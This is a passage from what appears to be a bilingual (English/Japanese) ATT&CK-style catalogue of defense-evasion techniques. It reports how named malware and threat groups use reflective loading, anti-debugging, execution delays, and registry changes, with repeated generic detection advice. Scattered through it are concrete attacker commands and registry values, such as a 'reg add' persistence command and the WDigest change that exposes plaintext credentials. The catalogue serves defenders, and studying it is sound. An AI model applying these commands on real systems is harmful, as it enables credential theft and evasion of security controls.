DLL "msfte.dll" with its own malicious version, which is loaded by the SearchIndexer.exe and SearchProtocolHost.exe. ShimRat can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls. One of Dtrack can replace the normal flow of a program execution with malicious code. Saint Bot will use the malicious file <code>slideshow.mp4</code> if present to load the core API provided by <code>ntdll.dll</code> to avoid any hooks placed on calls to the original <code>ntdll.dll</code> file by endpoint detection and response or antimalware software. COATHANGER will remove and write malicious shared objects associated with legitimate system functions such as `read(2)`. DarkGate edits the Registry key <code>HKCU\Software\Classes\mscfile\shell\open\command</code> to execute a malicious AutoIt script. When eventvwr.exe is executed, this will call the Microsoft Management Console (mmc.exe), which in turn references the modified Registry key. Raspberry Robin will drop a copy of itself to a subfolder in <code>%Program Data%</code> or <code>%Program Data%\\Microsoft\\</code> to attempt privilege elevation and defense evasion if not running in Session 0. Nightdoor uses a legitimate executable to load a malicious DLL file for installation. SPAWNCHIMERA can persist across system upgrades by hijacking the execution flow of dspkginstall, a binary used during the system upgrade process. 敵対者は、ホスト上でコンテナイメージをビルドして検知を回避することがある。 Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 ネットワークを分割し、横展開や影響範囲を限定する。 ネットワーク越しのリソースアクセスを制限する。 システムやアカウントを監査し、不正な活動を検出する。 ホスト上でのイメージビルドに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、ディスクに書かずメモリ上でコードをロードして検知を回避することがある。 Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., Shared Modules). リフレクティブコードロードに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 3CX Supply Chain Attack, AppleJeus leverages the publicly available open-source project DAVESHELL to convert PE-COFF files to position-independent code to reflectively load the payload into memory. During SharePoint ToolShell Exploitation, threat actors reflectively loaded payloads using `System.Reflection.Assembly.Load`. Lazarus Group has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via KernelCallbackTable hijacking. Lazarus Group has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime. FIN7 has loaded a .NET assembly into the currect execution context via `Reflection.Assembly::Load`. Gamaredon Group has used an obfuscated PowerShell script that used `System.Reflection.Assembly` to gather and send victim information to the C2. Kimsuky has used the Invoke-Mimikatz PowerShell script to reflectively load a Mimikatz credential stealing DLL into memory. Kimsuky has also used reflective loading through .NET assembly using `[System.Reflection.Assembly]::Load`. PlugX has loaded its payload into memory. Uroburos has the ability to load new modules directly into memory using its `Load Modules Mem` command. Cobalt Strike's <code>execute-assembly</code> command can run a .NET executable within the memory of a sacrificial process by loading the CLR. PowerSploit reflectively loads a Windows PE file into a process. Emotet has reflectively loaded payloads into memory. Lokibot has reflectively loaded the decoded DLL into memory. ThiefQuest uses various API functions such as <code>NSCreateObjectFileImageFromMemory</code> to load and link in-memory payloads. Cuba loaded the payload into memory using PowerShell. FoggyWeb's loader has reflectively loaded .NET-based assembly/payloads into memory. Gelsemium can use custom shellcode to map embedded DLLs into memory. Lizar has used the Reflective DLL injection module from Github to inject itself into a process’s memory. WhisperGate's downloader can reverse its third stage file bytes and reflectively load the file as a .NET assembly. SILENTTRINITY can run a .NET executable within the memory of a sacrificial process by loading the CLR. Donut can generate code modules that enable in-memory execution of VBScript, JScript, EXE, DLL, and dotNET payloads. IceApple can use reflective code loading to load .NET assemblies into `MSExchangeOWAAppPool` on targeted Exchange servers. metaMain has reflectively loaded a DLL to read, decrypt, and load an orchestrator file. Brute Ratel C4 has used reflective loading to execute malicious DLLs. BADHATCH can copy a large byte array of 64-bit shellcode into process memory and execute it with a call to `CreateThread`. Sardonic has a plugin system that can load specially made DLLs into memory and execute their functions. LunarLoader can use reflective loading to decrypt and run malicious executables in a new thread. Pikabot reflectively loads stored, previously encrypted components of the PE file into memory of the currently executing process to avoid writing content to disk on the executing machine. Lumma Stealer has used reflective loading techniques to load content into memory during execution. SystemBC has downloaded a text file into memory and set the area of memory via the VirtualProtect call. Then, SystemBC has executed the file via the CreateThread call. BRUSHFIRE has executed its commands within memory and is not saved on disk. MuddyViper has reflectively loaded the decrypted HackBrowserData tool in a new thread. Fooder has reflectively loaded a payload into memory. 敵対者は、デバッガの存在を検知して動作を変え分析を回避することがある。 Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads. デバッガ回避に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Dream Job, Lazarus Group used tools that used the `IsDebuggerPresent` call to detect debuggers. Mustang Panda has embedded debug strings with messages to distract analysts. Mustang Panda has also made calls to Windows API `CheckRemoteDebuggerPresent` and exits if it detects a debugger. PlugX has made calls to Windows API `CheckRemoteDebuggerPresent` and exits if it detects a debugger. ROKRAT can check for debugging tools. ThiefQuest uses a function named <code>is_debugging</code> to perform anti-debugging logic. The function invokes <code>sysctl</code> checking the returned value of <code>P_TRACED</code>. ThiefQuest also calls <code>ptrace</code> with the <code>PTRACE_DENY_ATTACH</code> flag to prevent debugging. DRATzarus can use `IsDebuggerPresent` to detect whether a debugger is present on a victim. Saint Bot has used `is_debugger_present` as part of its environmental checks. Bumblebee can search for tools used in static analysis. Mafalda can search for debugging tools on a compromised host. DarkTortilla can detect debuggers by using functions such as `DebuggerIsAttached` and `DebuggerIsLogging`. DarkTortilla can also detect profilers by verifying the `COR_ENABLE_PROFILING` environment variable is present and active. The Black Basta dropper can check system flags, CPU registers, CPU instructions, process timing, system libraries, and APIs to determine if a debugger is present. AsyncRAT can use the `CheckRemoteDebuggerPresent` function to detect the presence of a debugger. DarkGate checks the <code>BeingDebugged</code> flag in the PEB structure during execution to identify if the malware is being debugged. Raspberry Robin leverages anti-debugging mechanisms through the use of <code>ThreadHideFromDebugger</code>. Pikabot features several methods to evade debugging by analysts, including checks for active debuggers, the use of breakpoints during execution, and checking various system information items such as system memory and the number of processors. Latrodectus has the ability to check for the presence of debuggers. StrelaStealer variants include functionality to identify and evade debuggers. StealBit can detect it is being run in the context of a debugger. LockBit 3.0 can check heap memory parameters for indications of a debugger and stop the flow of events to the attached debugger in order to hinder dynamic analysis. XLoader uses anti-debugging mechanisms such as calling `NtQueryInformationProcess` with `InfoClass=7`, referencing `ProcessDebugPort`, to determine if it is being analyzed. Lumma Stealer has checked for debugger strings by invoking `GetForegroundWindow` and looks for strings containing “x32dbg”, “x64dbg”, “windbg”, “ollydbg”, “dnspy”, “immunity debugger”, “hyperdbg”, “debug”, “debugger”, “cheat engine”, “cheatengine” and “ida”. PUBLOAD has embedded debug strings with messages to distract analysts. PUBLOAD has leveraged `OutputDebugStringW` and `OutputDebugStringA` functions. TONESHELL has leveraged custom exception handlers to hide code flow and stop execution of a debugger. PureCrypter has the ability to call `CheckRemoteDebuggerPresent`. ANELLDR can call `ZwSetInformationThread` with the second argument set to `ThreadHideFromDebugger (0x11)` to evade being debugged. RustyWater has registered a Vectored Exception Handler (VEH) to catch debugging efforts. 敵対者は、実行を遅延させてサンドボックス分析を回避することがある。 Adversaries may employ various time-based methods to evade detection and analysis. These techniques often exploit system clocks, delays, or timing mechanisms to obscure malicious activity, blend in with benign activity, and avoid scrutiny. Adversaries can perform this behavior within virtualization/sandbox environments or natively on host systems. 実行遅延に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 3CX Supply Chain Attack, AppleJeus's software generates a randomly selected date that is between 1-4 weeks in the future. This timestamp is then checked against the current time of the compromised machine, and the malware will sleep until that time is encountered. Kimsuky has utilized the Sleep function to ensure execution of scripts. Mustang Panda has delayed the execution of payloads leveraging ping echo requests `cmd /c ping 8.8.8.8 -n 70&&"%temp%\<legitimate executable>"`. UPPERCUT can use a sleep function to delay execution. HIUPAN has used a config file “$.ini” to store a sleep multiplier to execute at a set interval value prior to initiating a watcher function that checks for a specific running process, that checks for removable drives and installs itself and supporting files if one is available. TONESHELL has the ability to pause operations for a specified duration prior to follow-on execution of activities. Qilin has the ability to delay execution. SystemBC has leveraged the Sleep functions before and after commands to ensure execution using the hexadecimal values within commands to include `Sleep(0x2710u)` that waits 10 seconds, and `Sleep(0xEA60u)` for 60 seconds. Shai-Hulud has delayed execution of its larger payloads by forking itself into background process. GlassWorm has used a timeout function set to `9e5` which delays execution 900,000 milliseconds or 15 minutes to avoid detection. PHASEJAM has used the `sleep` command within its code to generate a fake HTML upgrade progress bar that mimics a running process. BRICKSTORM has embedded delayed-start logic that attempts to circumvent detection for long-term persistence. BRICKSTORM has been observed configured with a “delay” timer built-in that waited for a hard-coded date months in the future before beginning to beacon to the configured C2 domain. PureCrypter has the ability to delay for a specified number of seconds before execution. SPAWNCHIMERA has used delayed execution to pause for a defined interval before performing environment discovery, repeatedly checking for specific processes, such as the `dslogserver` process, prior to continuing execution. AshTag can use a set sleep time to delay C2 beaconing. MuddyViper has the ability to sleep for a certain amount of time, with the default being one minute. Fooder has used a custom delay function (`delayExecution(integer)`) and Sleep API calls (`Sleep(integer)`) to slow code execution. RustyWater has generated random sleep intervals between C2 communication. DynoWiper has utilized a five-second delay using `Sleep(5000)` between two of the three phases of the attack that involves file overwriting, file deletion, and system reboot. 敵対者は、特定の対象を監視/防御から除外させて検知を回避することがある。 Adversaries may intentionally exclude certain files, folders, directories, file types, or system components from encryption or tampering during a ransomware or malicious payload execution. Some file extensions that adversaries may avoid encrypting include `.dll`, `.exe`, and `.lnk`. 選択的除外に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 VOID MANTICORE has avoided interacting with specific directories in order to reduce the likelihood of detection. Medusa Ransomware has avoided specified files, file extensions and folders to ensure successful execution of the payload and continued operations of the impacted device. InvisibleFerret has the capability to scan for file names, file extensions, and avoids pre-designated path names and file types. Embargo has avoided encrypting specific files and directories by leveraging a regular expression within the ransomware binary. SameCoin can avoid overwriting file names that contain “desktop.ini” and “conf.conf." DynoWiper has recursively enumerated directories with the exception of the following: System32, Windows, Program Files, Program Files(x86), Temp, Recycle.Bin, $Recycle.Bin, Boot, PerfLogs, AppData, Documents and Settings. LazyWiper can enumerate the hostname of the system to determine if it is a domain controller and exclude it from being wiped if so. 敵対者は、なりすましやメールスプーフィング等のソーシャルエンジニアリングで検知を回避し標的を欺くことがある。 Adversaries may use social engineering techniques to influence users to take actions that result in unauthorized access, approval of changes, disclosure of sensitive information, or execution of adversary-supplied instructions (i.e., introduction of malicious payloads or software), while minimizing technical indicators. 敵対者は、信頼される人物や組織になりすまして標的を欺くことがある。Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via Phishing for Information, Phishing, or Internal Spearphishing) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims. 敵対者は、メールの送信元を偽装(スプーフィング)して標的を欺くことがある。Adversaries may fake, or spoof, a sender’s identity by modifying the value of relevant email headers in order to establish contact with victims under false pretenses. In addition to actual email content, email headers (such as the FROM header, which contains the email address of the sender) may also be modified. Email clients display these headers when emails appear in a victim's inbox, which may cause modified emails to appear as if they were from the spoofed entity. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 ログイン試行回数やロックアウト等のアカウント使用ポリシーを設定する。 システムやアカウントを監査し、不正な活動を検出する。 ソーシャルエンジニアリングに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、Windowsレジストリを改変して防御を妨害したり痕跡を隠したりすることがある。 Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution. レジストリキーの権限を制限し、不正な改変を防ぐ。 レジストリの変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and manipulate the Registry. During Operation Honeybee, the threat actors used batch files that modified registry keys. During Operation Wocao, the threat actors enabled Wdigest by changing the `HKLM\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\WDigest` registry value from 0 (disabled) to 1 (enabled). During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry Internet settings to lower internet security before launching `rundll32.exe`, which in-turn launches the malware and communicates with C2 servers over the Internet. . During SharePoint ToolShell Exploitation, threat actors, including Storm-2603, disabled security services via Registry modifications. Turla has modified Registry values to store payloads. A Threat Group-3390 tool has created new Registry keys under `HKEY_CURRENT_USER\Software\Classes\` and `HKLM\SYSTEM\CurrentControlSet\services`. Lotus Blossom has installed tools such as Sagerunex by writing them to the Windows registry. Dragonfly has modified the Registry to perform multiple techniques through the use of Reg. A Patchwork payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs. Gamaredon Group has removed security settings for VBA macro execution by changing registry values <code>HKCU\Software\Microsoft\Office\&lt;version&gt;\&lt;product&gt;\Security\VBAWarnings</code> and <code>HKCU\Software\Microsoft\Office\&lt;version&gt;\&lt;product&gt;\Security\AccessVBOM</code>. Gamaredon Group has also modified Registry keys to hide folders and system files and to add the C2 address under `HKEY_CURRENT_USER\Console\WindowsUpdate`. OilRig has used reg.exe to modify system configuration. APT32's backdoor has modified the Windows Registry to store the backdoor's configuration. Magic Hound has modified Registry settings for security tools. FIN8 has deleted Registry keys during post compromise cleanup activities. APT19 uses a Port 22 malware variant to modify several Registry keys. Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under <code>HKCU\Software\Microsoft\Office\</code>. APT38 uses a tool called CLEANTOAD that has the capability to modify Registry keys. Silence can create, delete, or modify a specified Registry key or value. TA505 has used malware to disable Windows Defender through modification of the Registry. Kimsuky has modified Registry settings for default file associations to enable all macros and for persistence. Kimsuky has also modified the registry entry for `HKCU:\Software\Microsoft\Windows\CurrentVersion\Run` registry key for persistence with the name WindowsSecurityCheck. APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials. Wizard Spider has modified the Registry key <code>HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest</code> by setting the <code>UseLogonCredential</code> registry value to <code>1</code> in order to force credentials to be stored in clear text in memory. Wizard Spider has also modified the WDigest registry key to allow plaintext credentials to be cached in memory. Blue Mockingbird has used Windows Registry modifications to specify a DLL payload. Indrik Spider has modified registry keys to prepare for ransomware execution and to disable common administrative utilities. Aquatic Panda modified the victim registry to enable the `RestrictedAdmin` mode feature, allowing for pass the hash behaviors to function via RDP. Ember Bear modifies registry values for anti-forensics and defense evasion purposes. Earth Lusca modified the registry using the command <code>reg add “HKEY_CURRENT_USER\Environment” /v UserInitMprLogonScript /t REG_SZ /d “[file path]”</code> for persistence. LuminousMoth has used malware that adds Registry keys for persistence. Volt Typhoon has used `netsh` to create a PortProxy Registry modification on a compromised server running the Paessler Router Traffic Grapher (PRTG). Saint Bear will leverage malicious Windows batch scripts to modify registry values associated with Windows Defender functionality. BlackByte performed Registry modifications to escalate privileges and disable security tools. APT42 has modified Registry keys to maintain persistence. Medusa Group has modified Registry keys to elevate privileges, maintain persistence and allow remote access. Taidoor has the ability to modify the Registry on compromised hosts using <code>RegDeleteValueA</code> and <code>RegCreateKeyExA</code>. PoisonIvy creates a Registry subkey that registers a new system device. PlugX has a module to create, delete, or modify Registry keys. Regin appears to have functionality to modify remote Registry information. Uroburos can store configuration information in the Registry including the initialization vector and AES key needed to find and decrypt other Uroburos components. CHOPSTICK may modify Registry keys to store RC4 encrypted configuration information. BACKSPACE is capable of deleting Registry keys, sub-keys, and values on a victim system. gh0st RAT has altered the InstallTime subkey. ADVSTORESHELL is capable of setting and deleting Registry values. Reg may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface. Rover has functionality to remove Registry Run key persistence as a cleanup procedure. Crimson can set a Registry key to determine how long it has been installed and possibly to indicate the version number. ComRAT has modified Registry values to store encrypted orchestrator code and payloads. Once Shamoon has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting <code>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy</code> to 1. StreamEx has the ability to modify the Registry. RTM can delete all Registry entries created during its execution. Cobalt Strike can modify Registry values within <code>HKEY_CURRENT_USER\Software\Microsoft\Office\<Excel Version>\Excel\Security\AccessVBOM\</code> to enable the execution of additional code. SOUNDBITE is capable of modifying the Registry. PHOREAL is capable of manipulating the Registry. Volgmer modifies the Registry to store an encoded configuration file in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security</code>. NETWIRE can modify the Registry to store its configuration information. Hydraq creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. Hydraq's backdoor also enables remote attackers to modify and delete subkeys. Naid creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk. Nerex creates a Registry subkey that registers a new service. Orz can perform Registry operations. Bankshot writes data into the Registry key <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Pniumj</code>. ROKRAT can modify the `HKEY_CURRENT_USER\Software\Microsoft\Office\` registry key so it can bypass the VB object model (VBOM) on a compromised host. SynAck can manipulate Registry keys. BADCALL modifies the firewall Registry key <code>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileGloballyOpenPorts\\List</code>. PLAINTEE uses <code>reg add</code> to add a Registry Run key for persistence. Mosquito can modify Registry keys under <code>HKCU\Software\Microsoft\[dllname]</code> to store configuration values. Mosquito also modifies Registry keys under <code>HKCR\CLSID\...\InprocServer32</code> with a path to the launcher. InvisiMole has a command to create, set, copy, or delete a specified Registry key or value. Catchamas creates three Registry keys to establish persistence by adding a Windows Service. QuasarRAT has a command to edit the Registry on the victim’s machine. TYPEFRAME can install encrypted configuration data under the Registry key <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll</code> and <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs</code>. TrickBot can modify registry entries. FELIXROOT deletes the Registry key <code>HKCU\Software\Classes\Applications\rundll32.exe\shell\open</code>. Bisonal has deleted Registry keys to clean up its prior activity. QUADAGENT modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications. KEYMARBLE has a command to create Registry entries for storing data under <code>HKEY_CURRENT_USER\SOFTWARE\Microsoft\WABE\DataPath</code>. Zeus Panda modifies several Registry keys under <code>HKCU\Software\Microsoft\Internet Explorer\ PhishingFilter\</code> to disable phishing filters. Agent Tesla can achieve persistence by modifying Registry key entries. Remcos has full control of the Registry, including the ability to modify it. DarkComet adds a Registry value for its installation routine to the Registry Key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System Enable LUA=”0”</code> and <code>HKEY_CURRENT_USER\Software\DC3_FEXEC</code>. NanoCore has the capability to edit the Registry. GreyEnergy modifies conditions in the Registry and adds keys. Exaramel for Windows adds the configuration to the Registry in XML format. Cardinal RAT sets <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load</code> to point to its executable. zwShell can modify the Registry. KONNI has modified registry keys of ComSysApp, Svchost, and xmlProv on the machine to gain persistence. HOPLIGHT has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system. njRAT can create, delete, or modify a specified Registry key or value. Ursnif has used Registry modifications as part of its installation routine. LoJax has modified the Registry key <code>‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’</code> from <code>‘autocheck autochk *’</code> to <code>‘autocheck autoche *’</code>. ZxShell can create Registry entries to enable services to run. PoetRAT has made registry modifications to alter its behavior upon execution. Attor's dispatcher can modify the Run registry key. PowerShower has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process. ShimRat has registered two registry keys for shim databases. Lokibot has modified the Registry as part of its UAC bypass process. Metamorfo has written process names to the Registry, disabled IE browser features, deleted Registry keys, and changed the ExtendedUIHoverTime key. Netwalker can add the following registry entry: <code>HKEY_CURRENT_USER\SOFTWARE\{8 random characters}</code>. TajMahal can set the <code>KeepPrintedJobs</code> attribute for configured printers in <code>SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers</code> to enable document stealing. Valak has the ability to modify the Registry key <code>HKCU\Software\ApplicationContainer\Appsw64</code> to store information regarding the C2 server and downloads. CrackMapExec can create a registry key using wdigest. REvil can modify the Registry to save encryption parameters and system information. PipeMon has modified the Registry to store its encrypted payload. RegDuke can create seemingly legitimate Registry key to store its encryption key. Pillowmint has modified the Registry key <code>HKLM\SOFTWARE\Microsoft\DRM</code> to store a malicious payload. PolyglotDuke can write encrypted JSON configuration files to the Registry. CSPY Downloader can write to the Registry under the <code>%windir%</code> variable to execute tasks. Grandoreiro can modify the Registry to store its configuration at `HKCU\Software\` under frequently changing names including <code>%USERNAME%</code> and <code>ToolTech-RM</code>. SLOTHFULMEDIA can add, modify, and/or delete registry keys. It has changed the proxy configuration of a victim system by modifying the <code>HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap</code> registry. HyperStack can add the name of its communication pipe to <code>HKLM\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters\NullSessionPipes</code>. SUNBURST had commands that allow an attacker to write or delete registry keys, and was observed stopping services by setting their <code>HKLM\SYSTEM\CurrentControlSet\services\\[service_name]\\Start</code> registry entries to value 4. It also deleted previously-created Image File Execution Options (IFEO) Debugger registry values and registry keys related to HTTP proxy to clean up traces of its activity. TEARDROP modified the Registry to create a Windows service for itself on a compromised host. EVILNUM can make modifications to the Regsitry for persistence. Explosive has a function to write itself to Registry values. BitPaymer can set values in the Registry to help in execution. Caterpillar WebShell has a command to modify a Registry key. MegaCortex has added entries to the Registry for ransom contact information. Waterbear has deleted certain values from the Registry to load a malicious DLL. Pysa has modified the registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” and added the ransom note. Sibot has modified the Registry to install a second-stage script in the <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot</code>. ShadowPad can modify the Registry to store and maintain a configuration block and virtual file system. Stuxnet can create registry keys to load driver files. Conficker adds keys to the Registry at <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services</code> and various other Registry locations. Clop can make modifications to Registry keys. WastedLocker can modify registry values within the <code>Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap</code> registry key. Chaes can modify Registry values to stored information and establish persistence. Avaddon modifies several registry keys for persistence and UAC bypass. SMOKEDHAM has modified registry keys for persistence, to enable credential caching for credential access, and to facilitate lateral movement via RDP. QakBot can modify the Registry to store its configuration information in a randomly named subkey under <code>HKCU\Software\Microsoft</code>. Clambling can set and delete Registry keys. RCSession can write its configuration file to the Registry. SysUpdate can write its configuration file to <code>Software\Classes\scConfig</code> in either <code>HKEY_LOCAL_MACHINE</code> or <code>HKEY_CURRENT_USER</code>. Pandora can write an encrypted token to the Registry to enable processing of remote commands. ThreatNeedle can modify the Registry to save its configuration data as the following RC4-encrypted Registry key: `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameCon`. Gelsemium can modify the Registry to store its components. TinyTurla can set its configuration parameters in the Registry. KOCTOPUS has added and deleted keys from the Registry. WarzoneRAT can create `HKCU\Software\Classes\Folder\shell\open\command` as a new registry key during privilege escalation. DarkWatchman can modify Registry values to store configuration strings, keylogger, and output of components. CharmPower can remove persistence-related artifacts from the Registry. AADInternals can modify registry keys as part of setting a new pass-through authentication agent. Ferocious has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms. Neoichor has the ability to configure browser settings by modifying Registry entries under `HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer`. SILENTTRINITY can modify registry keys, including to enable or disable Remote Desktop Protocol (RDP). HermeticWiper has the ability to modify Registry keys to disable crash dumps, colors for compressed files, and pop-up information about folders and desktop items. Tarrask is able to delete the Security Descriptor (`SD`) registry subkey in order to “hide” scheduled tasks. Amadey has overwritten registry keys for persistence. DCSrv has created Registry keys for persistence. Mori can write data to `HKLM\Software\NFC\IPA` and `HKLM\Software\NFC\` and delete Registry values. PcShare can delete its persistence mechanisms from the registry. Prestige has the ability to register new registry keys for a new extension handler via `HKCR\.enc` and `HKCR\enc\shell\open\command`. metaMain can write the process ID of a target process into the `HKEY_LOCAL_MACHINE\SOFTWARE\DDE\tpid` Registry value as part of its reflective loading activity. Mafalda can manipulate the system registry on a compromised host. DarkTortilla has modified registry keys for persistence. BlackCat has the ability to add the following registry key on compromised networks to maintain persistence: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Paramenters` Black Basta has modified the Registry to enable itself to run in safe mode, to change the icons and file extensions for encrypted files, and to add the malware path for persistence. NightClub can modify the Registry to set the ServiceDLL for a service created by the malware for persistence. The Samurai loader component can create multiple Registry keys to force the svchost.exe process to load the final backdoor. NPPSPY modifies the Registry to record the malicious listener for output from the Winlogon process. IPsec Helper can make arbitrary changes to registry keys based on provided input. CHIMNEYSWEEP can use the Windows Registry Environment key to change the `%windir%` variable to point to `c:\Windows` to enable payload execution. ShrinkLocker modifies various registry keys associated with system logon and BitLocker functionality to effectively lock-out users following disk encryption. BlackByte Ransomware modifies the victim Registry to prevent system recovery. BlackByte 2.0 Ransomware modifies the victim Registry to allow for elevated execution. Kapeka writes persistent configuration information to the victim host registry. LockBit 2.0 can create Registry keys to bypass UAC and for persistence. TRANSLATEXT has modified the following registry key to install itself as the value, granting permission to install specified extensions: ` HKCU\Software\Policies\Google\Chrome\ExtensionInstallForcelist`. LockBit 3.0 can change the Registry values for Group Policy refresh time, to disable SmartScreen, and to disable Windows Defender. BOOKWORM has modified Registry key values as part of its created service `DeviceSync`. HIUPAN has modified registry keys to ensure hidden files and extensions are not visible through the modification of `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced`. Qilin can make Registry modifications to share networked drives between elevated and non-elevated processes and to increase the number of outstanding network requests per client. Qilin can also modify `HKEY_CURRENT_USER\Control Panel\Desktop\Wallpaper` to enable posting of ransom messages. Embargo has modified and deleted Registry keys to add services, and to disable Security Solutions such as Windows Defender. HiddenFace can store its configuration file in the Registry. NOOPLDR can store its payload in the Registry using a random hex string in `HKCU\SOFTWARE\Microsoft\COM3`. MuddyViper has the ability to clear the Registry values in the Windows Startup folder that were previously set for persistence. 敵対者は、不正なドメインコントローラを登録してデータを複製・改ざんすることがある。 Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys. 不正なドメインコントローラに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Mimikatz’s <code>LSADUMP::DCShadow</code> module can be used to make AD updates by temporarily setting a computer to be a DC. 敵対者は、ファイルやディレクトリの権限を変更して防御やアクセス制御を妨害することがある。 Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). 敵対者は、Windowsのファイル/ディレクトリ権限を変更することがある。Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). 敵対者は、Linux/macOSのファイル/ディレクトリ権限を変更することがある。Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 ファイル/ディレクトリ権限の変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Qilin can use symbolic links to redirect file paths for remote and local objects and can use `chmod +x` to make its payload binary executable. 敵対者は、グループポリシーやテナントのポリシーを改変して防御を妨害することがある。 Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation. 敵対者は、グループポリシーを改変して防御を妨害することがある。Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in 